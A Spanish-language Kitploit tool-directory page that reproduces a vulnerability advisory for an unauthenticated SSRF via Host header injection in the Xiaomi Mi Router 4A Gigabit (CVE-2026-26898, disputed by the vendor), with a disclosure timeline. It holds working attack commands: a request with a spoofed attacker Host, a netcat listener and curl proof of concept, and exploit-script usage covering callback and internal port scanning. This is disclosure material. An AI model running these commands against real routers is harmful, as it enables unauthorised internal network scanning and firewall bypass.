Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-26898-Xiaomi-SSRF-HostHeaderInjection — SSRF no autenticado en Xiaomi Mi Router 4A Gigabit Edition (firmware 3.0.24) mediante inyección de encabezado Host — CVE-2026-26898 | Kitploit
Herramientas/GitHubGitHub/iwallplace/cve-2026-26898-xiaomi-ssrf-hostheaderinjection
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad de RedesPruebas de PenetraciónRed Teaming
GitHubiwallplace/cve-2026-26898-xiaomi-ssrf-hostheaderinjection

CVE-2026-26898-Xiaomi-SSRF-HostHeaderInjection

SSRF no autenticado en Xiaomi Mi Router 4A Gigabit Edition (firmware 3.0.24) mediante inyección de encabezado Host — CVE-2026-26898

Ver Repositorio
111hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-26898: Xiaomi Mi Router 4A Gigabit - SSRF mediante inyección de cabecera Host

Vulnerability CVSS Status Vendor

Resumen

Existe una vulnerabilidad de Server-Side Request Forgery (SSRF) en la edición Gigabit del Xiaomi Mi Router 4A. La interfaz web del router no valida la cabecera HTTP Host, lo que permite a un atacante no autenticado forzar al router a realizar conexiones TCP salientes arbitrarias.

CampoValor
DispositivoXiaomi Mi Router 4A Gigabit Edition
Firmware3.0.24 (Internacional)
CVECVE-2026-26898 (disputado — ver Estado de divulgación más abajo)
CWECWE-918 (Server-Side Request Forgery)
CVSS 3.18.6 (Alto) — evaluado por el investigador; el proveedor disputa la gravedad

Respuesta del proveedor y estado de divulgación

Estado: Disputado por el proveedor — este informe no fue aceptado por Xiaomi.

  • Se informó a Xiaomi a través de HackerOne (informe #3513458) el 2026-01-16.
  • El 2026-01-23, Xiaomi cerró el informe como Informative, indicando que es un problema previamente conocido, que el router "sigue dependiendo de la función de proxy" y que lo clasifican como de bajo riesgo y que no lo abordarán.
  • Posición del investigador: la calificación de gravedad está en disputa. El dispositivo sigue vendiéndose activamente en los canales oficiales de Xiaomi (mi.com/tr) a partir de enero de 2026, el endpoint es accesible sin autenticación y el SSRF permite el escaneo de redes internas y el acceso a servicios que confían en conexiones locales. El comportamiento permanece sin parchear.

CVE-2026-26898 se utiliza aquí solo con fines de seguimiento; dado el conflicto con el proveedor, debe tratarse como disputado / no confirmado, no como confirmado por el proveedor.

Endpoint afectado

root@kitploit:~
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

Prueba de concepto

Captura de pantalla

Demostración del exploit

Prueba rápida

root@kitploit:~
python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check

Salida

root@kitploit:~
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444

Prueba manual

root@kitploit:~
# Terminal 1: Start listener
nc -l 4444

# Terminal 2: Send malicious request
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"

Impacto

  • Escaneo de red interna: usar el router como proxy para escanear redes internas
  • Omisión del firewall: acceder a servicios restringidos a la IP del router
  • Cadena de ataque: puede combinarse con otras vulnerabilidades para lograr RCE

Archivos

ArchivoDescripción
xiaomi_ssrf_exploit.pyExploit completo con múltiples modos

Uso del exploit

root@kitploit:~
# Check if vulnerable
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check

# Callback mode
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444

# Port scanner
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443

Cronología

FechaEvento
2026-01-15Vulnerabilidad descubierta; PoC desarrollado
2026-01-16Informada a Xiaomi a través de HackerOne (#3513458)
2026-01-23Xiaomi cerró el informe como Informative (bajo riesgo, no lo corregirá)
2026-06-03Aviso público publicado (este repositorio) — disputado por el proveedor, sin parchear

Referencias

  • Informe de HackerOne #3513458 (enviado a Xiaomi; cerrado como Informative)
  • CWE-918: Server-Side Request Forgery (SSRF)

Descargo de responsabilidad

Este exploit se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal.

Autor

Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace

Descargar herramienta